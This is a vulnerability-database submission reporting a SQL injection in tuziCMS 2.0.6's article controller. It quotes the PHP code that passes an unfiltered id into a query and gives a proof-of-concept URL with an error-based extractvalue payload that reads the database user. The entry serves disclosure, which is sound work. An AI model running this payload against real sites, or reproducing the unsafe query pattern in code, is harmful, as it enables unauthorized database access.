| Título | tuziCMS 2.0.6 App\Manage\Controller\ArticleController.class.php has SQLinject |
|---|
| Descripción | hello, i am a newcomer. First submission vulnerability.
A vulnerability classified as serious was found.
The article module does not filter the id parameter.
Causes a SQL injection vulnerability.It can query sensitive data, operate database and other hazards.
code:
\App\Manage\Controller\ArticleController.class.php
line: 18 - 22
public function index(){
C('TOKEN_ON',false);//关闭表单令牌
//查询指定id的栏目信息
$id=I('get.id');//类别ID
$topcate=M('Column')->where("id=$id")->order('column_sort')->select();
// dump($topcate);
// exit;
POC: http: //127.0.0.1/tuzicms/index.php/Manage/Article/index/id/1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))
|
|---|
| Fuente | ⚠️ https://github.com/yeyinshi/tuzicms/issues/12 |
|---|
| Usuario | Evilmu1 (UID 38763) |
|---|
| Sumisión | 2023-01-12 04:47 (hace 3 años) |
|---|
| Moderación | 2023-01-12 15:46 (11 hours later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 218151 [TuziCMS 2.0.6 Article ArticleController.class.php index ID inyección SQL] |
|---|
| Puntos | 20 |
|---|